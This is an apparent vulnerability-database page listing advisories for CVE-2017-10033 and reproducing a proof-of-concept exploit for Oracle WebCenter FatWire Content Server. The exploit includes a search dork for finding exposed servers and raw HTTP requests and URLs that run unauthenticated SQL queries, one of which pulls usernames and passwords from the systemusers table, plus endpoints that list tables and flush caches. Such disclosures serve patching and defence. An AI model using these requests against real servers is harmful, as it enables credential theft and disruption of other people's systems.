| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Unspecified Vulnerability in Oracle Fusion Middleware Oracle WebCenter Sites Component (CNVD-2017-33941) | 18 Oct 201700:00 | – | cnvd | |
| CVE-2017-10033 | 19 Oct 201717:00 | – | cve | |
| CVE-2017-10033 | 19 Oct 201717:00 | – | cvelist | |
| EUVD-2017-1680 | 7 Oct 202500:30 | – | euvd | |
| Oracle WebCenter FatWire Content Server 7 - Improper Access Control | 25 May 201800:00 | – | exploitpack | |
| CVE-2017-10033 | 19 Oct 201717:29 | – | nvd | |
| Oracle Critical Patch Update - October 2017 | 17 Oct 201700:00 | – | oracle | |
| Oracle WebCenter Sites Local Vulnerability (Oct 2017 CPU) | 20 Oct 201700:00 | – | nessus | |
| CVE-2017-10033 | 19 Oct 201717:29 | – | osv | |
| Oracle WebCenter (Fatwire) Improper Access Control | 25 May 201800:00 | – | packetstorm |
# Exploit Title: Oracle WebCenter FatWire Content Server < 7 - Improper Access Control
# Dork: inurl:Satellite?pagename
# Date: 2017-10-17
# Exploit Author: Sebastian Cornejo Olave
# Vendor Homepage: http://oracle.com
# Version: 5.5.2 ,7.5 <=
# CVE: CVE-2017-10033
# Category: Webapps
# Tested on: Kali linux
# VULNERABILITY DESCRIPTION
# It has been discovered that there is an incorrect access control over
# several resources in previous versions of Fatwire (confirmed
# FutureTenseContentServer 5.5.2 ,7.5) that allow the sending of SQL
# queries and query the tables and database schema without authentication.
# PoC : Improper Access Control
PAYLOAD : SQL query
POST /cs/Satellite HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
tbl=AArticles&query=select+username%2Cpassword+from+systemusers&pagename=Support%2FVerify%2Fexport
PAYLOAD : show all table database
https://www.example.com/cs/Satellite?pagename=Support/Verify/tablelistHTML
https://www.example.com/cs/Satellite?pagename=Support/CacheManager/FlushTables&cmd=null
OR request
POST /cs/Satellite HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
pagename=Support/Verify/tablelistHTML
PAYLOAD : URL list ID installed Site
https://www.example.com/cs/Satellite?pagename=OpenMarket/Demos/index
# Collaborators
# Vis0r
# QueseguridadData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation